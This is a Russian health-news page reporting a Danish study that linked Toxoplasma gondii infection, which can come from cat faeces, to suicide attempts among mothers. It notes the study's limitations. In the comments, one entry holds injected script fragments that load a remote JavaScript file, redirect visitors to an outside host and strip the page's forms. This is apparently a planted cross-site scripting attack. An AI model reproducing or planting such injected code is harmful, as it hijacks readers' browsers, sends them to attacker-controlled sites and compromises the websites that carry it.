Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кошки – причина суицида?!  >>  Кошки – причина суицида?!
 
Обратная связь
 

Кошки – причина суицида?!

Размер шрифта
09 августа 2012 07:04
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Паразиты, которые находятся в кошачьих фекалиях, плохо приготовленном мясе и на поверхности немытых овощей, увеличивают риск самоубийства у женщин.

кошки могут оказаться причиной суицида

Что такое Toxoplasma gondii

Возбудителем инфекции, которая может привести к столь плачевным последствиям, является паразит Toxoplasma gondii. Этот паразит обитает в организме 1/3 населения Земли, но в большинстве случаев люди не знают об этом, поскольку инфекция часто протекает бессимптомно. Если паразит находится в организме беременной женщины, то он может проникнуть в организм плода, что ведет к поражению головного мозга, слепоте и задержке умственного развития. Поэтому беременным женщинам и людям с ослабленным иммунитетом не рекомендуется ухаживать за кошками, в частности, менять наполнитель в кошачьем туалете.

Суть исследования

В исследовании приняли участие около 46 тысяч датских женщин, имеющих детей. Врачи, которые наблюдали женщин более 10 лет, пришли к выводу, что суицидальные попытки чаще встречались у женщин, зараженных Toxoplasma gondii.

Также оказалось, что инфицированные женщины предпринимали жестокие суицидальные попытки чаще, чем неинфицированные. Однако многие инфицированные женщины принимали препараты для контроля над жестокостью, поэтому, по всей видимости, паразиты не влияют на жестокость суицидальных попыток.

Один из авторов исследования подчеркивает, что полученные результаты не позволяют говорить о прямом влиянии инфекции на суицидальные попытки и действия. Для того чтобы лучше разобраться в проблеме, необходимо провести дополнительные исследования.

Результаты

В исследовании приняли участие только женщины, имеющие детей. Поскольку в исследовании не принимали участие ни мужчины, ни женщины без детей, возникает закономерный вопрос: справедливы ли полученные результаты для других групп населения.

Если ученым удастся понять, каким образом скрытые инфекции, в частности инфекция, вызванная Toxoplasma gondii, могут провоцировать суицидальные попытки у людей, страдающих депрессией, то им удастся по-новому взглянуть на факторы риска и профилактику суицидов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Признаки депрессии у близкого человека   Болезни-близнецы. Депрессия и гипотиреоз   Морщины приводят к депрессии! Как нанести двойной удар и по морщинам, и по депрессии?   Сладкие газировки вызывают депрессию  
01 апреля 2013Сладкие газировки вызывают депрессию 08 августа 2012Кошки являются причиной самоубийства!
 
07 ноября 2011Без витамина D можно сойти с ума 20 июля 2011Антидепрессанты приводят к депрессии
 

Слайдшоу

1
Вся правда о депрессии
От чего умер Робин Уильямс?
Мифы и факты о депрессии

Тесты

1
Что вы знаете о депрессии?
Как контролировать бронхиальную астму у детей
Как контролировать бронхиальную астму
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.